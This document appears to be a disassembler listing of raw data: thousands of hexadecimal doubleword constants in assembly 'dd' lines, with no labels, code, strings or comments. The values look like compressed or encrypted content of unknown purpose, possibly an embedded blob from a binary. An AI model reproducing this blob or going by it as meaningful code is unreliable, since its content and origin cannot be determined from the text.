		dd 0BB73AAAh, 0EA404C31h, 49BEEA5Dh, 0D174592Ch, 44690C4Dh
		dd 5DA2C440h, 0F0CF2276h, 0DEC6CB95h, 0C8FE7E57h, 7075DADBh
		dd 2527943Bh, 0CDCE86D8h, 22D07F5Ah, 675595B8h,	0E3402113h
		dd 277271D0h, 0A59CC999h, 6770882Ah, 9758B8A5h,	8D102D8Ah
		dd 89E1BE36h, 7F705D2h,	6367D95Fh, 49BB02A8h, 3A399980h
		dd 0E8E79ABh, 0AE9180EDh, 15F4266Eh, 8D4F655Ch,	0CA5C6D14h
		dd 0D62A3A4Fh, 2139D5B6h, 4E5DD6A8h, 9050087h, 2FD8C166h
		dd 0EDBC052Ch, 62B13DC2h, 0E0E48B54h, 0E5EE1h, 5A33CF98h
		dd 700A1D86h, 6AF80E50h, 6352E7AFh, 0D4381380h,	4F51CB38h
		dd 1991B0E5h, 2AB08B57h, 0B682C440h, 0CBEF85DAh, 0F0000315h
		dd 48E1D88Dh, 5A3F42B3h, 500DAE0Ah, 0D58F05F4h,	0A206BA14h
		dd 204EEA24h, 8C428F69h, 37088391h, 5C02DEF6h, 0F8520359h
		dd 297D2576h, 0B199EB78h, 2080BA59h, 288D5D00h,	85E637h
		dd 85965DB8h, 0B6C916D8h, 0E173D085h, 8BDA9CC7h, 0E84400BBh
		dd 30CEEB15h, 0A3EC01A1h, 41ED24D4h, 1FA83000h,	5540AE40h
		dd 89631FCBh, 57A1831h,	0B5B368B8h, 0C3B09780h,	178787E6h
		dd 2380A07Ch, 0C04C57E0h, 0E2A53998h, 0D027EA7Fh, 0A3D762h
		dd 41F2142Fh, 8CC239E1h, 4A1D0E02h, 16A84B0Fh, 492B4A06h
		dd 0D6061085h, 5E843680h, 771CE40h, 0D1474FD0h,	0B03C78D6h
		dd 1CAA532Bh, 0C4625D40h, 0B0EB2822h, 4D0380C8h, 0F0322AA4h
		dd 16D5AE9Bh, 70A8322Ah, 945C355Bh, 5BC80033h, 0B879E695h
		dd 0EE6224F2h, 9EBBCD2Bh, 0DF940811h, 0B2A42B9Ah, 88D55448h
		dd 53437172h, 1AE09CC8h, 0A4C2AF70h, 20AAAAE5h,	0F00734BDh
		dd 60ACDB24h, 54789AD1h, 63A039E5h, 6295F01Dh, 0B2AB1369h
		dd 45399703h, 0C1847A47h, 0F00A1307h, 0FB1ED44Ah, 0A7F8D402h
		dd 0DABA7D4h, 1B455280h, 0A83E3E10h, 755C214Eh,	7149EA3Eh
		dd 86B48C51h, 0A42A9A50h, 3D838669h, 0D0F70A24h, 63ED4731h
		dd 28679943h, 0DE4005F8h, 0C6704077h, 3B5519BAh, 0AAEF70D0h
		dd 5E93E684h, 4F5DED17h, 2AF04E35h, 47C559ABh, 21896614h
		dd 5C374C77h, 3BA7F94Dh, 0ACF4277Ch, 0D9C871F2h, 82A4637Bh
		dd 4CF22978h, 0CA94CD0Ch, 0B8FC2A5Bh, 549181Ah,	4152B211h
		dd 8CA94162h, 966E59DBh, 80312B38h, 22B71146h, 18CF35DFh
		dd 75C3817Dh, 11E6DAB7h, 8C51BAC7h, 0F2159266h,	3BF94E7Ah
		dd 0D3AC23D1h, 88F3855Dh, 0B0950713h, 312D059Ch, 0B054D558h
		dd 84BD528Bh, 7CFE20F1h, 0F7597CA1h, 0F5A94E23h, 2FC2032Ah
		dd 71AAA2CAh, 5E1DA168h, 0D1AA059Dh, 678A6054h,	0F9B06F55h
		dd 0F4ABED3Eh, 6522A733h, 6C53DDD1h, 5015B34Fh,	481E4B5h
		dd 0BD114078h, 4EC216ADh, 610D16D7h, 5B32A5Dh, 0A31C5BCDh
		dd 58E96BECh, 9153B6A1h, 531285C2h, 61A66767h, 5AFE1C15h
		dd 0A1948D56h, 174CFB51h, 0A5AF087Eh, 707F1C20h, 9730EFD6h
		dd 3B2281E0h, 9C826317h, 98524CE0h, 1B14E367h, 7823377Ah
		dd 4A2203Ah, 0F5C1F6BEh, 0A5B0707h, 6A04771Dh, 75A24D1Fh
		dd 0F98092FFh, 49ACB22Fh, 0B0DBBA29h, 6EB2514Fh, 0D6766385h
		dd 8C6A30FAh, 84BB17Fh,	2C4AC5DCh, 0B6E00E8Ah, 462732B6h
		dd 945E8471h, 45742B1Dh, 44517E28h, 24B4984Ah, 0B4388360h
		dd 0F07F27Fh, 9311191Ch, 59A2879Eh, 0FFF6061Ch,	22475E8Bh
		dd 2FA1FD1Fh, 51B686BDh, 17A694DEh, 9A2AACF0h, 0E2E89DCAh
		dd 45BD2ADEh, 0A97A7691h, 5CFCF163h, 7968F0h, 747F5E67h
		dd 0DEA47A6Dh, 2208C65h, 624F48A3h, 37EA40D6h, 0F6F07255h
		dd 0F70CDA18h, 0F69A7B96h, 0E509D3F8h, 0CDD234FAh, 0D5B161F8h
		dd 8EC06EF3h, 54BC558Ch, 0AD86115Bh, 2C2FC79Dh,	51281A4h
		dd 471702FBh, 3A01DF5Ch, 82E6468Eh, 6FC790AAh, 198BCB62h
		dd 7CB5C032h, 4514E1B4h, 0AF11EDF8h, 7683C545h,	8B51517Eh
		dd 82645721h, 2D7D5742h, 0E015E14Fh, 2E10D7DFh,	0E2FA19EFh
		dd 0B5B8ED5Ah, 0A94BFAB8h, 4942F14Eh, 0AC58BAA2h, 290123F0h
		dd 0D828683Ch, 48E043B8h, 0AB413641h, 614F3832h, 21A75CB6h
		dd 0CF9403A3h, 978358BFh, 5F2969B3h, 26028421h,	432482Eh
		dd 55C44EA3h, 0EF6BA7BFh, 0A85FBACDh, 9CDF04ACh, 4EF6F934h
		dd 36E06197h, 525DE54Dh, 0A77BA983h, 0A6A99618h, 6887A1DDh
		dd 6FB3C08Fh, 0D245E28Ah, 0E6AE51Ch, 2AC7557Fh,	2422F8D0h
		dd 6893E8FAh, 2CD9699h,	840AE528h, 46255B84h, 0B561F0F2h
		dd 42CF29CDh, 55147ED7h, 0AACF931Ch, 55D25E31h,	0BA7F933Ch
		dd 1EB09C84h, 0DB952606h, 0EFB98A0h, 759BBF36h,	7AE1E423h
		dd 4A55B810h, 0F2934F8Fh
		dd 8E0D8755h, 565C210Bh, 8B8C166Eh, 55F18BBDh, 0CA8FD01Dh
		dd 0D4E1306Ah, 813CD8D1h, 9AD1141Dh, 0BBC87A1Eh, 53111A3Ah
		dd 6FCA9A35h, 4C45B852h, 9464E591h, 0F86099F9h,	87E2D8Dh
		dd 0E784FFBEh, 10681F3Eh, 3C557E3Bh, 944C49F1h,	0EAE90286h
		dd 0A2765FF6h, 0EF0BD70h, 0E30AA8F0h, 7ACC2E6Bh, 8540014Eh
		dd 6A22DB26h, 9DFB445Dh, 4C5AEB0Eh, 0D65AE90h, 502F9F04h
		dd 0C5069281h, 54701E04h, 0F8CE485Dh, 3C158E4Eh, 0F47C9AE0h
		dd 1E530683h, 53381F1Eh, 0E9B7CFF0h, 0AE496EDEh, 5A6600BCh
		dd 1B54A730h, 21B5180Eh, 6EBAAFDDh, 707555C1h, 1338E07Dh
		dd 0DB1100DBh, 40226079h, 58641569h, 0C805EB2Bh, 0B83121h
		dd 8AB8E63h, 0D8A8F2B9h, 0CE44D4EAh, 0B0B78BF8h, 0C04C15DAh
		dd 37499BB8h, 98A12968h, 0F8DF706h, 70AEE83Eh, 0F090019Dh
		dd 83309175h, 42EB869Eh, 4AF8690Ah, 0D84CF318h,	0F49A9C70h
		dd 22F62975h, 13C9FEF7h, 221A1816h, 2EBB7494h, 18189D71h
		dd 0C59E354h, 3E086CC6h, 0EFFABFF8h, 901B229Bh,	13CFF561h
		dd 0CB8DB8AEh, 35E0577h, 8E03A397h, 0E6361E2Fh,	0ADF04D20h
		dd 248485FFh, 0C590CB69h, 33144014h, 28D40703h,	3E02BCA2h
		dd 0EDF77638h, 0D215EAF5h, 8A85E13Fh, 8F47D22Bh, 3DDE60CDh
		dd 2C2A2CD7h, 70BEBE2Ah, 17C35D7Dh, 0E215C55Fh,	330AE0F8h
		dd 0C2966024h, 0B9F7DF8Ch, 0E07F83F1h, 9C1F99F2h, 589027Fh
		dd 0F27CC5A2h, 826003BCh, 602460E4h, 63927C24h,	0BA748B5Dh
		dd 9921501Eh, 0C233D114h, 0C4AF06FCh, 6DB98033h, 5FC957EBh
		dd 0A2EF62E8h, 0F33ED16Bh, 76DC6E5Eh, 1F4132B2h, 8C14BCFCh
		dd 7B895299h, 0EA7A5413h, 70D64192h, 0FC1CF2C1h, 0FD4C985Bh
		dd 28C0203Bh, 0BE17FE22h, 0C264D0CAh, 0ACD9930Fh, 771185C6h
		dd 19AC0765h, 24532FBFh, 0FA701147h, 6BBDECE0h,	0E4EAB83Bh
		dd 2147017Ah, 58A72736h, 29E9338Eh, 725EA709h, 0D7CA7706h
		dd 4183C545h, 0FE1E1C01h, 0D226AFF4h, 0EA8D381Dh, 6BA3C4F8h
		dd 0C244C9EBh, 89C3DAE8h, 0C2FA2B63h, 6459FBF1h, 7484E916h
		dd 58BAAB0Bh, 5B111058h, 4D41FA84h, 7EC172EAh, 0B080DC37h
		dd 0C5C1981Ch, 179BDCC4h, 4EA02208h, 41A0ACEFh,	0B13A1ABh
		dd 2C357D05h, 4A84846Ah, 5872104Dh, 33478DDCh, 4B3962Ch
		dd 90C0946Ch, 450BFE31h, 0F5C62202h, 234B40F0h,	530E303Eh
		dd 34127500h, 15B7488Ah, 0F49567D2h, 0F506580Ch, 0C64C8574h
		dd 0A9B40FC1h, 1F859FD3h, 0CA356C52h, 5D24BBB8h, 351EB28Fh
		dd 7C0EB15Dh, 1875842Ah, 0D1D4D180h, 0B3B015BBh, 0DDC3D200h
		dd 9EADEF14h, 2D0F907Fh, 94DB6432h, 0FD9CDB72h,	0E352247Ch
		dd 0D0BD07A5h, 0E4225482h, 75ADB0AEh, 4AAF3146h, 390C50Ah
		dd 5808530Ah, 3D70D10Ch, 0A8D5A846h, 20B5508h, 0CFB70B15h
		dd 625CF84h, 181E8BE7h,	2A990FA6h, 3B3E81Eh, 62FB356Dh
		dd 36475F1h, 1BA4D78h, 0F022C859h, 0C2881D3h, 0D2868656h
		dd 0B1CE5809h, 89C1478Dh, 0FF313408h, 0B2E936A6h, 3F5C2280h
		dd 19A52BE1h, 59FBD5F9h, 40D25400h, 74B10917h, 117177C6h
		dd 0B174C5D0h, 0BF045437h, 4EE60861h, 0F048417Ch, 0FFE2E465h
		dd 82903585h, 96255539h, 0FEC1C6F8h, 8FB215D2h,	48BEDF62h
		dd 15D88926h, 7DE8BC0Bh, 501CF0B3h, 81DED0C2h, 105449DFh
		dd 807DFDD2h, 776CEBFCh, 40233D70h, 2B0E208Ch, 121703E0h
		dd 3E2A0D2Bh, 89D44A08h, 1710D421h, 5B9F3F19h, 4C3F19DBh
		dd 0A2D9B5FCh, 36AA066Fh, 0B2968774h, 0CFCFFF9h, 149441D0h
		dd 901934C2h, 0E9E9DFA0h, 3E44F13Bh, 862C5AECh,	77690F04h
		dd 0E972623Dh, 182EDD77h, 5D21A4B4h, 0AA5D8DD8h, 0AA4E2BF8h
		dd 139A4DB7h, 1EAEE8A2h, 0A8D54AA0h, 0CAB181F8h, 351B7261h
		dd 7E1A54FFh, 0A5017229h, 876236CFh, 9EB9A28Ah,	70A95219h
		dd 59064057h, 42C980CBh, 0F2E18C4Ah, 408CFC22h,	5B324D04h
		dd 5166C440h, 0BDBA59Ah, 9CA26CB3h, 7AE65848h, 81381C8Ah
		dd 43DD2A25h, 0E8E7ECA0h, 59BC0B27h, 0B016145Ch, 0CBC80913h
		dd 710428B9h, 58D7A81Ah, 1543AD44h, 9FC14631h, 920CFCF5h
		dd 5F0DD3A1h, 21EB5979h, 0E80CB792h, 8A4AE101h,	0D0227BD5h
		dd 18AEC228h, 7DEBEC44h, 4152C427h, 0FC62A4ADh,	8BB72863h
		dd 371481Eh, 0F45320BCh, 25C59DAFh, 0A88AD9Ah, 16BF62E6h
		dd 0F39DC5D2h, 0D2F6D26Dh, 1468FE2Eh, 0D35ECE76h, 0EB88C235h
		dd 0FE84C588h, 222F2500h, 55A1EAB2h, 4D7C19CAh,	0C1B1DABDh
		dd 6A4D2152h, 44BD1995h, 33972C70h, 44B97886h, 0D4599047h
		dd 2C548112h, 4606D12Fh, 3AAC7445h, 975D5DC1h, 0E060EBD0h
		dd 0FF965064h, 0E5B8F93Fh, 6F7CB8B7h, 0F7B948B9h, 52620A77h
		dd 4418C431h, 0E620707Ch, 7AFD9C9Dh, 1579120Ah,	0B54298BEh
		dd 0D14473CCh, 455F973Ah, 48F6E4E6h, 0CFC386Fh,	0FA4BD905h
		dd 85EDF7B0h, 0DEC58B58h, 75726A6Fh, 704A090Dh,	1DA34904h
		dd 0B5D92E0h, 99E409E8h, 8B8261FDh, 0FC192CDh, 0F0550086h
		dd 0A0C7F43h, 317D5360h, 66AF2D14h, 662F647Eh, 0F015C16Bh
		dd 879288Ah, 0F8424910h, 9A000023h, 8002E7D0h, 2F80A5FBh
		dd 5D041548h, 0AD4A19FFh, 5D293A7Ch, 0FC2CE82Dh, 97D093DFh
		dd 0F28E072Fh, 885F48F9h, 59D64CA1h, 3BA2E160h,	2C97C21h
		dd 0F66763C3h, 81B477FEh, 313575ECh, 317D8A44h,	28A046B8h
		dd 46435Ch, 0D95612C2h,	0F2110854h, 6825C849h, 7A7B00BFh
		dd 0B83004B0h, 81A50870h, 0C822617Ch, 84422516h, 8CD65B06h
		dd 0CFC5C97Ch, 55390Ch,	1477A0BFh, 0B0641B9Eh, 8278A004h
		dd 89CA2A86h, 0C55A236Bh, 61940E9Fh, 0D5EF4A75h, 17D8E144h
		dd 33D0CC5Eh, 11A64030h, 0B33D34A0h, 970D6AEh, 3EA80CF0h
		dd 38A43B80h, 7A305154h, 421440E0h, 0DD00942Ch,	7626A00Dh
		dd 188FA61Dh, 0F693FB54h, 0E0E2417Fh, 0D5AAF395h, 82D1C9F0h
		dd 0E3590B55h, 0B20E785Eh, 0A125DEAEh, 7F94C7E6h, 57AB8A3Bh
		dd 0F1D073EEh, 0F4C188EFh, 92F284FFh, 6D51E620h, 0B2679243h
		dd 695620E5h, 267D2B2Ah, 0B406EB6h, 330E5607h, 382C4ABAh
		dd 0A4838B44h, 2E8CE10Fh, 0F3AB03C6h, 0FB80AE87h, 43B07DC5h
		dd 0CC03108h, 0F7F25EFDh, 0A5B1F9FFh, 60F2458h,	0BA41775Fh
		dd 0F22BFD02h, 7E9AB03Ch, 15CBA528h, 0D881149Ch, 33529AABh
		dd 468CF0B1h, 9C86CBD9h, 6A2BF80Ah, 7FB5F900h, 0EF70E8C4h
		dd 35931439h, 333EEB5Fh, 0D4B2802Fh, 65A0DD0Dh,	0AA384A15h
		dd 3372845h, 23C4D3B8h,	0B405ACA8h, 87116Eh, 64B5611h
		dd 0B4B35B9Fh, 0CB43EA11h, 0B475D1CAh, 0E1BA1A44h, 7F4B85F1h
		dd 9B899CC3h, 34C0E8BBh, 0E80184D9h, 983A19E8h,	0C2571E12h
		dd 418859F9h, 84AE483Dh, 2C87F287h, 0BC0FEF1Bh,	0D50AEDE9h
		dd 5DBC5C0Eh, 93A8ACD4h, 0BCFB4B42h, 0C1D0E04h,	0A5299722h
		dd 6D06F7C0h, 0B75E060Ch, 2E8B6005h, 0DDE4B976h, 4DEAEC28h
		dd 209B2713h, 0A715542Ah, 9BC4CF30h, 93468BB2h,	5289F4B5h
		dd 879C305Bh, 6EC1C952h, 7FBFC4A2h, 0D026C055h,	23E55ACCh
		dd 0BAD4EE16h, 6B2CF0E5h, 0C3209520h, 0AE705D2h, 0C5409F7Eh
		dd 0D781321Ah, 8977066h, 15D02A73h, 0F715F7Ch, 5C07D91Dh
		dd 0A72E81CCh, 602E74B9h, 0A30968E0h, 718367E7h, 0BD86FAD4h
		dd 2B9AA264h, 1D74935h,	17AF2913h, 0A0983948h, 5ACB9B8Dh
		dd 7F9119A9h, 2DFCC014h, 71656FEAh, 0ACB24E7Eh,	0B3BE6C92h
		dd 86D3E856h, 3D2AFC3Fh
		dd 2898711Fh, 93F9B683h, 1AFB57C0h, 16565EBAh, 6661184h
		dd 3E5FAF4Ah, 0C00302BAh, 7814FBAFh, 89723C88h,	504AAC35h
		dd 30D15D4Ch, 0A256A35h, 1D6BC1F0h, 0AEF56437h,	22EFA681h
		dd 2DA34E0Ch, 29FF3405h, 0C30AB963h, 0C3C1F056h, 601BB159h
		dd 3F012480h, 4454C1C0h, 73F18935h, 29423006h, 0E20025A4h
		dd 43743BB4h, 9A8B61D5h, 0A60255Fh, 88536BF8h, 8269FC0Dh
		dd 32C84612h, 0D9D209EAh, 0AC8701E9h, 3D88836Eh, 3434344Eh
		dd 628B0A68h, 0FBC840ACh, 0E68A8608h, 37248F78h, 0A505B966h
		dd 0F0EA19AAh, 5A96E5AEh, 844CDFC5h, 0C2682B4Eh, 657EF9CBh
		dd 32183F95h, 848A6000h, 0B212A86Ch, 5E02BEB5h,	4F0363B4h
		dd 48D7C9C5h, 0AC4B7D84h, 0A4D0298Bh, 0DA1F715Dh, 53AA08B4h
		dd 70765816h, 97C7B4E1h, 0C2E5EC3h, 0FF477312h,	0B8F82E8h
		dd 1F5E133Eh, 0E459B2BFh, 6BB145E2h, 451A508Dh,	6020B37h
		dd 87E32F8h, 280E8BE0h,	4B6912FEh, 12670181h, 0FAFCC5F6h
		dd 5032905h, 513F5123h,	98039101h, 3A0A0163h, 60091104h
		dd 510EF263h, 1E7F055Fh, 75556540h, 2CE4F302h, 0B45DADC1h
		dd 94312E57h, 92C94905h, 49F63B18h, 483EDEB8h, 0A4615943h
		dd 0A929C24Ch, 14D2FC51h, 70CA0A04h, 3C25EBADh,	11065DCAh
		dd 0C9229AE9h, 319F5E39h, 9DA9BE45h, 404C5DB0h,	23007731h
		dd 465CFFDCh, 80173714h, 0B1E0BB48h, 78929751h,	42C1452Fh
		dd 68172850h, 0B0A84548h, 6B636CFFh, 0B4486024h, 2D8CF950h
		dd 0F238D77Ah, 6304ECC2h, 25AE87F1h, 2037B181h,	0A3EE40B1h
		dd 1C612D3Ah, 33213E35h, 0AE5B2EEBh, 7FD57EF7h,	0C96483FFh
		dd 29C52713h, 0BE0474E0h, 0C10278D6h, 0E6915207h, 0C167C884h
		dd 5F8B04BEh, 24A56D90h, 2BAA0454h, 0F0FA344Fh,	4E501B03h
		dd 28C794D1h, 45A1C245h, 7E19A60Ah, 16F939DDh, 16107782h
		dd 5E90DD99h, 0A95C716Ch, 4C1947C5h, 0CC222B4Ch, 8076467Eh
		dd 88BF51A0h, 3BDE6760h, 9844744Ch, 0C2E9B859h,	0DA7BEDC5h
		dd 97540950h, 0CC44BCF8h, 0EC35E0AAh, 611094Ch,	4C4EEEB1h
		dd 990D29D0h, 6BC22010h, 0BA43C0ECh, 0F2F077F1h, 3FB39F48h
		dd 505A8086h, 0CF5C78D3h, 6CA78302h, 254BBBC8h,	0E66D01E8h
		dd 237CFC4Fh, 6FA3E12Ch, 5781654h, 38886DD4h, 0FE1C2CC2h
		dd 47EF1FA6h, 36C38C96h, 0BCD841AFh, 0B423F08Ch, 0F8BE544Ah
		dd 38C27935h, 2D974062h, 0CCA843BDh, 3912705Bh,	0E90C590Eh
		dd 1058AF0h, 4CA3959Dh,	0A14F1CACh, 77CD17E8h, 0B9EFBA14h
		dd 4F0391C4h, 0E31910BAh, 911F8B1Dh, 6367BF5Eh,	8D4570F8h
		dd 0E90D7360h, 3A8A4766h, 0D510AFE6h, 4CF9E93Ch, 22AE51F8h
		dd 0A754AB56h, 79FA50D2h, 2FEABE47h, 10BAD1C2h,	1A8ED4F4h
		dd 0C94D2110h, 93DFFF2Fh, 6C647F08h, 7F01A256h,	511A5641h
		dd 578E86Ch, 7E43BF0h, 2FFB2FB0h, 312DBE8Bh, 0CE735F1Bh
		dd 8C04F201h, 80AE1F05h, 8E086A85h, 934D4300h, 31C06620h
		dd 0F81A1083h, 0C16B42C2h, 0EF49AAE3h, 760A015Ah, 502DA10h
		dd 54C88039h, 50582942h, 418C3800h, 70331EDFh, 0BF5DE9h
		dd 0BD244E5Ah, 804AB893h, 0CCEFDA3Ah, 268EBFE6h, 5A231A8Eh
		dd 0C45DF4EAh, 0C1CF1E42h, 8AE2E9E6h, 95A04218h, 0E9FD40C4h
		dd 25BA5C9Dh, 2BA414C6h, 0E8274500h, 0D88B8B07h, 45AE15F0h
		dd 6B435221h, 205607A0h, 88929B88h, 42241101h, 9F6E3168h
		dd 169440Ch, 0F0379B7Bh, 0B8AFAB17h, 0D4C53351h, 89BF470Fh
		dd 3210CA5Fh, 518D4100h, 0D58083B7h, 0E0B32D10h, 14B126E2h
		dd 0A2B1B271h, 2E8738D8h, 0FDF18C44h, 0E8724DBAh, 6131B8E8h
		dd 0D888EF9Bh, 9C0A5142h, 9CFB8D06h, 93F60FB4h,	82A305A5h
		dd 0C5A9891Ch, 0D9F6D981h, 41ACD5D5h, 0EC025F61h, 0FE870DA2h
		dd 0EF2D9BF0h, 0CC17E13Dh, 0F502A620h, 0B97D30D7h, 526777C7h
		dd 6C283154h, 2E92F81Ch, 77172148h, 7200BC6Dh, 0ECB50FDBh
		dd 7F8330FCh, 6372DE2Ch, 6EB540A8h, 4F9290D0h, 0C540482Ah
		dd 45D79D43h, 0D576CA06h, 0CC0B0A1h, 6E05FAAh, 0A864CAD4h
		dd 65EA41CCh, 0FB753FF7h, 598D9CCh, 761F3061h, 92DF1215h
		dd 70246321h, 21A00853h, 0A0881446h, 2F3F29A5h,	0FDBD60B1h
		dd 3EDC2910h, 0D21D3064h, 68E180Dh, 4B1D8035h, 0EB88C431h
		dd 8BA482A5h, 40888261h, 83075512h, 4F5C2338h, 84025428h
		dd 6E0F238Dh, 8DC376DFh, 0ED34AE9Bh, 1A601D3h, 481267D6h
		dd 0A5317C99h, 702D62EAh, 6ABB848h, 1FEE40FAh, 8609520Ch
		dd 5D7A3377h, 520F4438h, 7FA2638h, 0E8875C3Fh, 16C40443h
		dd 703E52F5h, 5067443Dh, 97173058h, 51797CFBh, 0B6BF178Dh
		dd 0B9C02BEAh, 0A8936078h, 7F3B3D77h, 0A0FC4129h, 0D9E55679h
		dd 0B916855h, 0FED828EBh, 62EEDC1Dh, 0DBCDAC40h, 874CF687h
		dd 0BD6A240Eh, 8C0BAB86h, 0A8A686AFh, 0AAED046Ah, 60B84EE6h
		dd 76697C93h, 0E6032B1Ah, 3FE5318Bh, 0F63343F0h, 30D08691h
		dd 268F6752h, 85D884B6h, 6EE168C5h, 60956E85h, 0BD78DB39h
		dd 8EA1B7FEh, 0B28AE55Ch, 8515ABE4h, 0B065E8FBh, 63B2D1C3h
		dd 9CA34962h, 2811455Eh, 8E6DC78h, 74083875h, 0A4F01125h
		dd 5D62A8A8h, 0A621290Bh, 6C174C46h, 62D52F5Fh,	4113F88h
		dd 0D7C4058Ah, 0BDAB8773h, 0A73A5746h, 90C76EA3h, 7585A49Eh
		dd 0D427132h, 161A6B84h, 2408B15Eh, 4A5A247Fh, 53D471C5h
		dd 0B946DB80h, 289799Ch, 40A05B56h, 0FFEECEE3h,	0E9847259h
		dd 3137C321h, 0CEC7F7E0h, 0FDE42F5Ah, 0DA68A22Bh, 523C4956h
		dd 176C7E12h, 39563687h, 5A676D0Eh, 3F937FA5h, 0F626D2A1h
		dd 0C35C7554h, 0CAFE05ECh, 17DCD43h, 6730397h, 0DD7DF738h
		dd 71B5D2C6h, 0E124F8A8h, 46FFD9C0h, 0E1D15F6Dh, 991D8081h
		dd 8F20B8F3h, 0F933E500h, 3C188EDAh, 0C146068Ch, 0CAB1DD8Eh
		dd 651AACF5h, 93E05467h, 0EB50501Ah, 62B00C33h,	75840EF0h
		dd 0C74419C0h, 4755159Dh, 52E2E603h, 9602B44Fh,	0CB82386Ch
		dd 0FC237CBAh, 65C190D7h, 1041307Ch, 9BDEA0BCh,	1E506E5Eh
		dd 0AAE52273h, 9A54D0A1h, 6C49E237h, 0F0446D50h, 0D209F860h
		dd 0CD8B0A18h, 4A9C0D6Ah, 0A01298D0h, 7E679815h, 7755A55Dh
		dd 86B74984h, 81C7A82Bh, 9DF014Ch, 0F6176094h, 0FDAF06EDh
		dd 0D1521BF7h, 0C7B70C2Ch, 0E148FAA1h, 5253FE6h, 4A1C412Ah
		dd 0C534DD9Ch, 10AB1055h, 0CCB3A54Eh, 0ED109625h, 7335CBE5h
		dd 383F6CAh, 415C52A9h,	5A9B21FEh, 0AA29531Dh, 2A846E1Dh
		dd 7C0668E0h, 0C527EA53h, 0EA1F16CDh, 76828EE2h, 6970A1B2h
		dd 87908BCEh, 845581BFh, 4903D028h, 0B673D47Dh,	0C5F6AF54h
		dd 6309F359h, 5DCE15EAh, 0F2BB4605h, 0EFE72172h, 0C8DD8627h
		dd 0E7BA5C1h, 5D997082h, 0D3BFED65h, 75EEE7DCh,	0D6858105h
		dd 779C7FEEh, 0D5BAB994h, 74EA43D3h, 62F219DEh,	0D5FFF5A1h
		dd 0A1707AB6h, 0E7A9EBB7h, 57178106h, 1A772370h, 0F46A808h
		dd 73465271h, 82109334h, 8D0CE080h, 4A676670h, 8ABF333Ch
		dd 0EC41C07Eh, 9943105Bh, 0F0CA45B2h, 17680143h, 419C2CA0h
		dd 0A3E41EBFh, 0EE9744CEh, 2A999EA9h, 6209D86Eh, 40CD188Eh
		dd 0D4816428h, 9D88E94Ah, 0F0381447h, 689EC3C5h, 8EC86628h
		dd 44DC6FFBh, 0B9FAD6EBh, 4DEC8E46h, 925A3A0Ah,	0F5CC75DCh
		dd 50E4E789h, 0F12E1C8Fh, 0FED9574h, 9A62B20Ch,	0E2BA8D8Ah
		dd 55FCE86Ch, 0BC527096h, 0B345318Ah, 7C08C7A7h, 0D04552BCh
		dd 2B3C2D5Fh, 23B1B94Ah
		dd 304B782Ah, 40AE632Bh, 85EDF84h, 16AE1B78h, 3D9CD9DFh
		dd 0A6D07EDFh, 48153C5h, 7A730A1Bh, 0D68020DDh,	991728BAh
		dd 0D598E370h, 0BC5A4A26h, 9C37576Dh, 0C36D21BDh, 0FB06D9B8h
		dd 6C131885h, 9AEA801Ah, 2651863h, 1C0E5Eh, 96FF112Ah
		dd 5F027112h, 39899F50h, 94A1011h, 269D6FF0h, 0E134F8ECh
		dd 8BF8060Eh, 0BA80E022h, 83CFC76Fh, 0E6C5738Bh, 0D4346F14h
		dd 61E19A30h, 0F995B25Dh, 0A56A5DEAh, 6FD59BB3h, 1BFF8363h
		dd 45090358h, 5E0FE331h, 25219888h, 6FFEEC2Dh, 21475439h
		dd 0BBD82EF1h, 42968230h, 0A8953E3Ch, 68A27B92h, 0D66B8B89h
		dd 5B0A0755h, 0ADD6C3AAh, 6D1B62h, 368940EAh, 71A3B84Dh
		dd 8AEEA194h, 9909AAF1h, 0C40606F6h, 0EDF857CCh, 2D362C1Dh
		dd 70E28485h, 0AF603082h, 894114DBh, 145A3B3Ah,	29144D8h
		dd 0BFB4199Fh, 563153E0h, 0A24778D1h, 0A6E3DF9h, 999C72Bh
		dd 1309E937h, 0C4A29B4Ah, 1C25DFDCh, 0D3C5AEFAh, 6EACD640h
		dd 6C1C64F4h, 0D56905DAh, 4545F889h, 7FA8B41h, 2E8D2E7Eh
		dd 0B41DB4AFh, 0DBE0E90Ch, 42455C11h, 251C9946h, 0E07183BFh
		dd 0D2186172h, 68D67059h, 5F48E63h, 36EDC503h, 3674EE81h
		dd 0BD7C325Fh, 7144BB76h, 386F10AFh, 8C0A5465h,	0F00FB041h
		dd 66BF5385h, 1C40185Dh, 0B5E5A43Ah, 30E822AAh,	0FA0017A8h
		dd 0C5E00B84h, 0C5D4CB08h, 0B4743F0Bh, 1276ED1h, 0A46AF94Fh
		dd 0F23A32ABh, 0A309D1A4h, 0C5817327h, 0BED6FEDCh, 3EB40214h
		dd 573F7062h, 43B79CFDh, 0CD8E9723h, 1DB89AB2h,	917F7F1h
		dd 0F82E88E6h, 0FE3281A2h, 0C03C2AE9h, 90407515h, 55F0DED1h
		dd 2CD6B460h, 0C03A172Bh, 0D68915Bh, 625F0DAh, 0C1C3B257h
		dd 0CE876158h, 143941A8h, 60C918C4h, 0FB5608A9h, 0D8950600h
		dd 32A45D2Fh, 795C2D62h, 0A338E6ABh, 0E7024C94h, 8FE3F46Ah
		dd 0BF459A0Eh, 9228A989h, 0B8EF1AFAh, 4B755598h, 0E270A3FCh
		dd 0A36940E9h, 7102CA27h, 20AC32BDh, 8D3E0FF1h,	0C07B871h
		dd 149D96F5h, 13462970h, 17ABB7D3h, 8D15B454h, 4EB1994Eh
		dd 0B42A45C9h, 18FF76C0h, 16747720h, 0BDCBEEC5h, 621767FBh
		dd 0A4ABC741h, 4D8B9FEEh, 526FBFDAh, 6E76FC37h,	0E6FB9BD4h
		dd 34A750C1h, 0FA3E17CCh, 0EA603EA2h, 84AE6922h, 0B317CB63h
		dd 42A793AAh, 8C3EA5B1h, 5E249B72h, 115EB33Bh, 0E0E9AF77h
		dd 5898E0BCh, 12F1D043h, 0FEC337AEh, 175A9E4Ch,	5057B370h
		dd 6D7CFB85h, 0B251F646h, 0FDA27B65h, 554E62B8h, 0F845412Ah
		dd 0E51A47A1h, 21706BC8h, 0C4B148BEh, 26D39681h, 889B369Ah
		dd 6AE4C4DAh, 0E4615213h, 14D2F549h, 7334165Ch,	0DD93FD68h
		dd 99578D55h, 7DCB1C38h, 0C7AE4C51h, 0D021D601h, 0C0F10515h
		dd 35D72FD6h, 9DB99185h, 0B9F84D59h, 0D121108Eh, 0F91B1F73h
		dd 0B9F29839h, 632AA88Bh, 0AA29322Fh, 0F6CCCAD9h, 0ADEF562Bh
		dd 0C4EA0C4h, 0CAF2C065h, 0D05DABACh, 57459800h, 0B150612Bh
		dd 99B35DEAh, 663E289Ah, 0D7279DDEh, 7AAC810Ah,	9D1D5AD0h
